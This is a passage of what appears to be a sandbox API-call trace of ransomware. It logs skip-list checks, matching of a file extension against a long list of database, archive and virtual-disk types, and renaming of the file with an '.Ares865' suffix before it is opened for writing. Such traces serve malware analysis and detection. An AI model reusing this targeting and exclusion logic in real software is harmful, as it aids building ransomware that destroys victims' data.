(lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.597] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="aoldtz.exe") returned 1 [0057.597] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootmgr") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="temp") returned -1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="pagefile.sys") returned -1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ids.txt") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="perflogs") returned -1 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="MSBuild") returned 1 [0057.598] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0057.598] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 77 [0057.598] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0057.598] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0057.598] lstrlenW (lpString="Ares865") returned 7 [0057.598] lstrcmpiW (lpString1="rans-ms", lpString2="Ares865") returned 1 [0057.598] lstrlenW (lpString=".dll") returned 4 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".dll") returned 1 [0057.598] lstrlenW (lpString=".lnk") returned 4 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".lnk") returned 1 [0057.598] lstrlenW (lpString=".ini") returned 4 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".ini") returned 1 [0057.598] lstrlenW (lpString=".sys") returned 4 [0057.598] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".sys") returned 1 [0057.598] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0057.598] lstrlenW (lpString="bak") returned 3 [0057.598] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0057.598] lstrlenW (lpString="ba_") returned 3 [0057.598] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0057.598] lstrlenW (lpString="dbb") returned 3 [0057.598] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0057.598] lstrlenW (lpString="vmdk") returned 4 [0057.598] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0057.598] lstrlenW (lpString="rar") returned 3 [0057.598] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0057.598] lstrlenW (lpString="zip") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0057.599] lstrlenW (lpString="tgz") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0057.599] lstrlenW (lpString="vbox") returned 4 [0057.599] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0057.599] lstrlenW (lpString="vdi") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0057.599] lstrlenW (lpString="vhd") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0057.599] lstrlenW (lpString="vhdx") returned 4 [0057.599] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0057.599] lstrlenW (lpString="avhd") returned 4 [0057.599] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0057.599] lstrlenW (lpString="db") returned 2 [0057.599] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0057.599] lstrlenW (lpString="db2") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0057.599] lstrlenW (lpString="db3") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0057.599] lstrlenW (lpString="dbf") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0057.599] lstrlenW (lpString="mdf") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0057.599] lstrlenW (lpString="mdb") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0057.599] lstrlenW (lpString="sql") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0057.599] lstrlenW (lpString="sqlite") returned 6 [0057.599] lstrcmpiW (lpString1="ans-ms", lpString2="sqlite") returned -1 [0057.599] lstrlenW (lpString="sqlite3") returned 7 [0057.599] lstrcmpiW (lpString1="rans-ms", lpString2="sqlite3") returned -1 [0057.599] lstrlenW (lpString="sqlitedb") returned 8 [0057.599] lstrcmpiW (lpString1="trans-ms", lpString2="sqlitedb") returned 1 [0057.599] lstrlenW (lpString="xml") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0057.599] lstrlenW (lpString="$er") returned 3 [0057.599] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0057.599] lstrlenW (lpString="4dd") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0057.600] lstrlenW (lpString="4dl") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0057.600] lstrlenW (lpString="^^^") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0057.600] lstrlenW (lpString="abs") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0057.600] lstrlenW (lpString="abx") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0057.600] lstrlenW (lpString="accdb") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0057.600] lstrlenW (lpString="accdc") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0057.600] lstrlenW (lpString="accde") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0057.600] lstrlenW (lpString="accdr") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0057.600] lstrlenW (lpString="accdt") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0057.600] lstrlenW (lpString="accdw") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0057.600] lstrlenW (lpString="accft") returned 5 [0057.600] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0057.600] lstrlenW (lpString="adb") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0057.600] lstrlenW (lpString="adb") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0057.600] lstrlenW (lpString="ade") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0057.600] lstrlenW (lpString="adf") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0057.600] lstrlenW (lpString="adn") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0057.600] lstrlenW (lpString="adp") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0057.600] lstrlenW (lpString="alf") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0057.600] lstrlenW (lpString="ask") returned 3 [0057.600] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0057.601] lstrlenW (lpString="btr") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0057.601] lstrlenW (lpString="cat") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0057.601] lstrlenW (lpString="cdb") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0057.601] lstrlenW (lpString="ckp") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0057.601] lstrlenW (lpString="cma") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0057.601] lstrlenW (lpString="cpd") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0057.601] lstrlenW (lpString="dacpac") returned 6 [0057.601] lstrcmpiW (lpString1="ans-ms", lpString2="dacpac") returned -1 [0057.601] lstrlenW (lpString="dad") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0057.601] lstrlenW (lpString="dadiagrams") returned 10 [0057.601] lstrcmpiW (lpString1="egtrans-ms", lpString2="dadiagrams") returned 1 [0057.601] lstrlenW (lpString="daschema") returned 8 [0057.601] lstrcmpiW (lpString1="trans-ms", lpString2="daschema") returned 1 [0057.601] lstrlenW (lpString="db-journal") returned 10 [0057.601] lstrcmpiW (lpString1="egtrans-ms", lpString2="db-journal") returned 1 [0057.601] lstrlenW (lpString="db-shm") returned 6 [0057.601] lstrcmpiW (lpString1="ans-ms", lpString2="db-shm") returned -1 [0057.601] lstrlenW (lpString="db-wal") returned 6 [0057.601] lstrcmpiW (lpString1="ans-ms", lpString2="db-wal") returned -1 [0057.601] lstrlenW (lpString="dbc") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0057.601] lstrlenW (lpString="dbs") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0057.601] lstrlenW (lpString="dbt") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0057.601] lstrlenW (lpString="dbv") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0057.601] lstrlenW (lpString="dbx") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0057.601] lstrlenW (lpString="dcb") returned 3 [0057.601] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0057.602] lstrlenW (lpString="dct") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0057.602] lstrlenW (lpString="dcx") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0057.602] lstrlenW (lpString="ddl") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0057.602] lstrlenW (lpString="dlis") returned 4 [0057.602] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0057.602] lstrlenW (lpString="dp1") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0057.602] lstrlenW (lpString="dqy") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0057.602] lstrlenW (lpString="dsk") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0057.602] lstrlenW (lpString="dsn") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0057.602] lstrlenW (lpString="dtsx") returned 4 [0057.602] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0057.602] lstrlenW (lpString="dxl") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0057.602] lstrlenW (lpString="eco") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0057.602] lstrlenW (lpString="ecx") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0057.602] lstrlenW (lpString="edb") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0057.602] lstrlenW (lpString="epim") returned 4 [0057.602] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0057.602] lstrlenW (lpString="fcd") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0057.602] lstrlenW (lpString="fdb") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0057.602] lstrlenW (lpString="fic") returned 3 [0057.602] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0057.602] lstrlenW (lpString="flexolibrary") returned 12 [0057.602] lstrcmpiW (lpString1=".regtrans-ms", lpString2="flexolibrary") returned -1 [0057.602] lstrlenW (lpString="fm5") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0057.603] lstrlenW (lpString="fmp") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0057.603] lstrlenW (lpString="fmp12") returned 5 [0057.603] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0057.603] lstrlenW (lpString="fmpsl") returned 5 [0057.603] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0057.603] lstrlenW (lpString="fol") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0057.603] lstrlenW (lpString="fp3") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0057.603] lstrlenW (lpString="fp4") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0057.603] lstrlenW (lpString="fp5") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0057.603] lstrlenW (lpString="fp7") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0057.603] lstrlenW (lpString="fpt") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0057.603] lstrlenW (lpString="frm") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0057.603] lstrlenW (lpString="gdb") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0057.603] lstrlenW (lpString="gdb") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0057.603] lstrlenW (lpString="grdb") returned 4 [0057.603] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0057.603] lstrlenW (lpString="gwi") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0057.603] lstrlenW (lpString="hdb") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0057.603] lstrlenW (lpString="his") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0057.603] lstrlenW (lpString="ib") returned 2 [0057.603] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0057.603] lstrlenW (lpString="idb") returned 3 [0057.603] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0057.603] lstrlenW (lpString="ihx") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0057.604] lstrlenW (lpString="itdb") returned 4 [0057.604] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0057.604] lstrlenW (lpString="itw") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0057.604] lstrlenW (lpString="jet") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0057.604] lstrlenW (lpString="jtx") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0057.604] lstrlenW (lpString="kdb") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0057.604] lstrlenW (lpString="kexi") returned 4 [0057.604] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0057.604] lstrlenW (lpString="kexic") returned 5 [0057.604] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0057.604] lstrlenW (lpString="kexis") returned 5 [0057.604] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0057.604] lstrlenW (lpString="lgc") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0057.604] lstrlenW (lpString="lwx") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0057.604] lstrlenW (lpString="maf") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0057.604] lstrlenW (lpString="maq") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0057.604] lstrlenW (lpString="mar") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0057.604] lstrlenW (lpString="marshal") returned 7 [0057.604] lstrcmpiW (lpString1="rans-ms", lpString2="marshal") returned 1 [0057.604] lstrlenW (lpString="mas") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0057.604] lstrlenW (lpString="mav") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0057.604] lstrlenW (lpString="maw") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0057.604] lstrlenW (lpString="mdbhtml") returned 7 [0057.604] lstrcmpiW (lpString1="rans-ms", lpString2="mdbhtml") returned 1 [0057.604] lstrlenW (lpString="mdn") returned 3 [0057.604] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0057.605] lstrlenW (lpString="mdt") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0057.605] lstrlenW (lpString="mfd") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0057.605] lstrlenW (lpString="mpd") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0057.605] lstrlenW (lpString="mrg") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0057.605] lstrlenW (lpString="mud") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0057.605] lstrlenW (lpString="mwb") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0057.605] lstrlenW (lpString="myd") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0057.605] lstrlenW (lpString="ndf") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0057.605] lstrlenW (lpString="nnt") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0057.605] lstrlenW (lpString="nrmlib") returned 6 [0057.605] lstrcmpiW (lpString1="ans-ms", lpString2="nrmlib") returned -1 [0057.605] lstrlenW (lpString="ns2") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0057.605] lstrlenW (lpString="ns3") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0057.605] lstrlenW (lpString="ns4") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0057.605] lstrlenW (lpString="nsf") returned 3 [0057.605] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0057.605] lstrlenW (lpString="nv") returned 2 [0057.605] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0057.605] lstrlenW (lpString="nv2") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0057.606] lstrlenW (lpString="nwdb") returned 4 [0057.606] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0057.606] lstrlenW (lpString="nyf") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0057.606] lstrlenW (lpString="odb") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0057.606] lstrlenW (lpString="odb") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0057.606] lstrlenW (lpString="oqy") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0057.606] lstrlenW (lpString="ora") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0057.606] lstrlenW (lpString="orx") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0057.606] lstrlenW (lpString="owc") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0057.606] lstrlenW (lpString="p96") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0057.606] lstrlenW (lpString="p97") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0057.606] lstrlenW (lpString="pan") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0057.606] lstrlenW (lpString="pdb") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0057.606] lstrlenW (lpString="pdm") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0057.606] lstrlenW (lpString="pnz") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0057.606] lstrlenW (lpString="qry") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0057.606] lstrlenW (lpString="qvd") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0057.606] lstrlenW (lpString="rbf") returned 3 [0057.606] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0057.606] lstrlenW (lpString="rctd") returned 4 [0057.606] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0057.607] lstrlenW (lpString="rod") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0057.607] lstrlenW (lpString="rodx") returned 4 [0057.607] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0057.607] lstrlenW (lpString="rpd") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0057.607] lstrlenW (lpString="rsd") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0057.607] lstrlenW (lpString="sas7bdat") returned 8 [0057.607] lstrcmpiW (lpString1="trans-ms", lpString2="sas7bdat") returned 1 [0057.607] lstrlenW (lpString="sbf") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0057.607] lstrlenW (lpString="scx") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0057.607] lstrlenW (lpString="sdb") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0057.607] lstrlenW (lpString="sdc") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0057.607] lstrlenW (lpString="sdf") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0057.607] lstrlenW (lpString="sis") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0057.607] lstrlenW (lpString="spq") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0057.607] lstrlenW (lpString="te") returned 2 [0057.607] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0057.607] lstrlenW (lpString="teacher") returned 7 [0057.607] lstrcmpiW (lpString1="rans-ms", lpString2="teacher") returned -1 [0057.607] lstrlenW (lpString="tmd") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0057.607] lstrlenW (lpString="tps") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0057.607] lstrlenW (lpString="trc") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0057.607] lstrlenW (lpString="trc") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0057.607] lstrlenW (lpString="trm") returned 3 [0057.607] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0057.607] lstrlenW (lpString="udb") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0057.608] lstrlenW (lpString="udl") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0057.608] lstrlenW (lpString="usr") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0057.608] lstrlenW (lpString="v12") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0057.608] lstrlenW (lpString="vis") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0057.608] lstrlenW (lpString="vpd") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0057.608] lstrlenW (lpString="vvv") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0057.608] lstrlenW (lpString="wdb") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0057.608] lstrlenW (lpString="wmdb") returned 4 [0057.608] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0057.608] lstrlenW (lpString="wrk") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0057.608] lstrlenW (lpString="xdb") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0057.608] lstrlenW (lpString="xld") returned 3 [0057.608] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0057.608] lstrlenW (lpString="xmlff") returned 5 [0057.608] lstrcmpiW (lpString1="ns-ms", lpString2="xmlff") returned -1 [0057.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.Ares865") returned 122 [0057.608] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.ares865"), dwFlags=0x1) returned 1 [0057.609] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.609] 